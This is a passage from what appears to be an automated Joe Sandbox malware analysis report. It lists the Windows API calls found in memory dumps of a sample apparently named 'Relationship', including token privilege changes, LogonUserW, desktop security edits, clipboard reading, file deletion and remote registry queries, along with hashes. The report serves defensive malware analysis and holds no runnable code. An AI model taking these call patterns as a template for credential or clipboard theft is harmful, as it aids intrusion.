                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff6a894a217dcefee864b4da87f8fcbc26edec814bfd31f5e94438a8124b6344
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DF082352002045FCB14EF58D455B7EB7E5AF84720F048489F9068B362CB70FC05CB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5205A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C52087
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: GetLastError.KERNEL32 ref: 00C52097
                                                                                                                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C51BD2
                                                                                                                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C51BF4
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C51C05
                                                                                                                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C51C1D
                                                                                                                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 00C51C36
                                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00C51C40
                                                                                                                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C51C5C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C51B48), ref: 00C51A20
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A0B: CloseHandle.KERNEL32(?,?,00C51B48), ref: 00C51A35
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                                                                                                                            • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                            • Opcode ID: a1f41e96ed8b2ab4a3ba3ad29b7d0edbfea032bfc9205868e0f92bd063684678
                                                                                                                                                                                                                                                                            • Instruction ID: c046bea2011aadd4793bfca0e5fefd587f8e131b977efe21f16f83b58cfe1bf1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1f41e96ed8b2ab4a3ba3ad29b7d0edbfea032bfc9205868e0f92bd063684678
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04818F75900209AFDF119FA4DC89FEE7BB8FF04305F184029FD25A61A0D7758A89DB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51A60
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A6C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A82
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C51A99
                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C51518
                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C5154C
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C51563
                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C5159D
                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C515B9
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C515D0
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C515D8
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C515DF
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C51600
                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00C51607
                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C51636
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C51658
                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C5166A
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C51691
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C51698
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C516A1
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C516A8
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C516B1
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C516B8
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C516C4
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C516CB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: GetProcessHeap.KERNEL32(00000008,00C514FD,?,00000000,?,00C514FD,?), ref: 00C51AED
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C514FD,?), ref: 00C51AF4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C514FD,?), ref: 00C51B03
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1344366a7b5d87df8e54891fcff061e94075fdb9a83ccfbac3cb5534778dd8ea
                                                                                                                                                                                                                                                                            • Instruction ID: 2794cfa763d2f623aa70e667499e9eb4f0b9acaeed87610a060f6404b50949ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1344366a7b5d87df8e54891fcff061e94075fdb9a83ccfbac3cb5534778dd8ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22715EB9900209ABDF10DFA5DC48FAEBBB8FF04351F184515FD26A7190DB319A49CB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00C8DCD0), ref: 00C6F586
                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C6F594
                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00C6F5A0
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C6F5AC
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C6F5E4
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C6F5EE
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C6F619
                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00C6F626
                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 00C6F62E
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C6F63F
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C6F67F
                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C6F695
                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000F), ref: 00C6F6A1
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C6F6B2
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C6F6D4
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C6F6F1
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C6F72F
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C6F750
                                                                                                                                                                                                                                                                            • CountClipboardFormats.USER32 ref: 00C6F771
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C6F7B6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 420908878-0
                                                                                                                                                                                                                                                                            • Opcode ID: f559293884196e7cfed6a39c75faa7d57fb374df8ed1b539fa771539d6909b20
                                                                                                                                                                                                                                                                            • Instruction ID: 04ad0699424bc42a25939e210914d7743f1cd978d863bb8dc56f2f7c4a3f5c3d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f559293884196e7cfed6a39c75faa7d57fb374df8ed1b539fa771539d6909b20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0961DF35204205AFD310EF24E885F2AB7E4AF84314F1444ADF956C72E2DB31EE4ACB62
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C67403
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C67457
                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C67493
                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C674BA
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C674F7
                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C67524
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                            • Opcode ID: 7402cdc57259541961a13ee10cc204351ae732ead3419f152f5636aafbf3ce75
                                                                                                                                                                                                                                                                            • Instruction ID: 06575e3a49b67b5c4886fec2891ee29d60d60f5ba6cf36c689ecfb3b5e698cc0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7402cdc57259541961a13ee10cc204351ae732ead3419f152f5636aafbf3ce75
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BD15E72508308AEC710EB64C885EBFB7ECAF88704F44495DF695D7192EB74DA48CB62
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C6A0A8
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C6A0E6
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00C6A100
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C6A118
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A123
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C6A13F
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6A18F
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CB7B94), ref: 00C6A1AD
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6A1B7
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A1C4
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A1D4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                            • Opcode ID: 4b5d65d589b465b55b27fd3fdfe81b114356696f0eef0a9b57ec9f39519e73cb
                                                                                                                                                                                                                                                                            • Instruction ID: 784e8d11831243c8843772f8b0928c1a3eef22dd1a4efb0fe3a59e593887036e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b5d65d589b465b55b27fd3fdfe81b114356696f0eef0a9b57ec9f39519e73cb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B431B532600219ABDB24AFB4DC89BDE77AC9F46360F100165E826F21D0EB74DE859F65
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C64785
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C647B2
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C647E2
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C64803
                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00C64813
                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C6489A
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C648A5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C648B0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                            • Opcode ID: 87366bdb583eed73f2d48073180ee3807b1d33a2f905b7ee17cb96d5cbb98b0a
                                                                                                                                                                                                                                                                            • Instruction ID: 69e1e18abbdfc4fc20450b45a04d07c604d2635a0c8a283f2beb5554caeab9ec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87366bdb583eed73f2d48073180ee3807b1d33a2f905b7ee17cb96d5cbb98b0a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D031907150024AAADB209BA0DC89FEF37BCEF89751F1041B6F51AD20A0E7709B84DB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C6A203
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C6A25E
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A269
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C6A285
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6A2D5
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CB7B94), ref: 00C6A2F3
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6A2FD
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A30A
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A31A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C5E3B4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                            • Opcode ID: 4914006c9e4adcb7c0f1724a5d3a8190a60fdc75ff52f355f36c0ac6c8cd7517
                                                                                                                                                                                                                                                                            • Instruction ID: a06b8e304b8120a2973cc438d06fd7cc2b77c4f4aeb4350a70bc8783a9768ee4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4914006c9e4adcb7c0f1724a5d3a8190a60fdc75ff52f355f36c0ac6c8cd7517
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A31123154021AABCB20AFA5DC89FDE77ACAF45324F1041A1E825B31E0DB31DF859F29
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7C10E,?,?), ref: 00C7D415
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D451
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4C8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4FE
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C99E
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00C7CA09
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7CA2D
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C7CA8C
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C7CB47
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C7CBB4
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C7CC49
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7CC9A
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C7CD43
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C7CDE2
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7CDEF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                            • Opcode ID: 507789facf96b84cc3ea5a54bf8a86f314067d3b6fadc8e5592ac23f9b92b1e5
                                                                                                                                                                                                                                                                            • Instruction ID: d3f8809a9af093cec7feeaf0e97cbad16d4bb7197d736569d3d7c4ce88db5662
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 507789facf96b84cc3ea5a54bf8a86f314067d3b6fadc8e5592ac23f9b92b1e5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B024A71604205AFC714DF28C8D5E2ABBE5EF49314F18C4ADE85ACB2A2DB31ED46CB51
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF55D1,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BF5871
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5EAB0: GetFileAttributesW.KERNEL32(?,00C5D840), ref: 00C5EAB1
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C5D9CD
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C5DA88
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C5DA9B
